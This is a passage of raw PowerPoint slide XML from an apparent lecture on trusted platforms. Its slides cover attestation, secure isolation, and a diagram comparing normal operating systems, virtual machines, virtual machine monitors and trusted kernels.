              <a:t>Trusted Platform</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Trusted platform combines best properties of</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Open: allow applications from many different sources to run on same platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Closed: remote parties can determine what software is running and whether to expect the platform to be well behaved</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Done through attestation</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smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>OS for trusted platforms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9219" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="226243" y="1206631"/>
            <a:ext cx="8559538" cy="5651369"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Primary security objective of OS in a trusted platform </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2100" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>secure isolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Mainstream OS (e.g. Windows, Linux)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Large and complex code base</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Optimized for ease of use, performance and reliability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Trusted OS (e.g. Trusted Solaris/IRIX/BSD)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Not user friendly (because of security policy)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="4850389"/>
            <a:ext cx="1828800" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="50195"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3250189"/>
            <a:ext cx="1828800" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>userland</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="4850389"/>
            <a:ext cx="1828800" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="50195"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2590800" y="3250189"/>
            <a:ext cx="1828800" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="1600">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="4850389"/>
            <a:ext cx="1828800" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="50195"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>VMM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="3250189"/>
            <a:ext cx="1828800" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="4850389"/>
            <a:ext cx="914400" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="50195"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6858000" y="3250189"/>
            <a:ext cx="914400" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>userland</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="3847089"/>
            <a:ext cx="914400" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="10196"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505200" y="3250189"/>
            <a:ext cx="914400" cy="596900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>userland</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="4240789"/>
            <a:ext cx="914400" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="30196"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="3250189"/>
            <a:ext cx="914400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>userland</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="4240789"/>
            <a:ext cx="914400" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="30196"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5638800" y="3250189"/>
            <a:ext cx="914400" cy="990600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>userland</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 22"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="4850389"/>
            <a:ext cx="914400" cy="762000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent2">
              <a:alpha val="50195"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>trusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>kernel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7772400" y="3250189"/>
            <a:ext cx="914400" cy="1600200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25400">
            <a:solidFill>
              <a:schemeClr val="accent2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>trusted</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>userland</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="5840989"/>
            <a:ext cx="1828800" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="5993389"/>
            <a:ext cx="1828800" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN">
              <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text Box 28"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="5764789"/>
            <a:ext cx="1981200" cy="581025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Normal OS (Windows, Linux)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text Box 29"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="5764789"/>
            <a:ext cx="2209800" cy="581025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Virtual Machine (VMWare, Java VM)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text Box 30"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="5764789"/>
            <a:ext cx="2209800" cy="581025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Virtual Machine Monitor</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
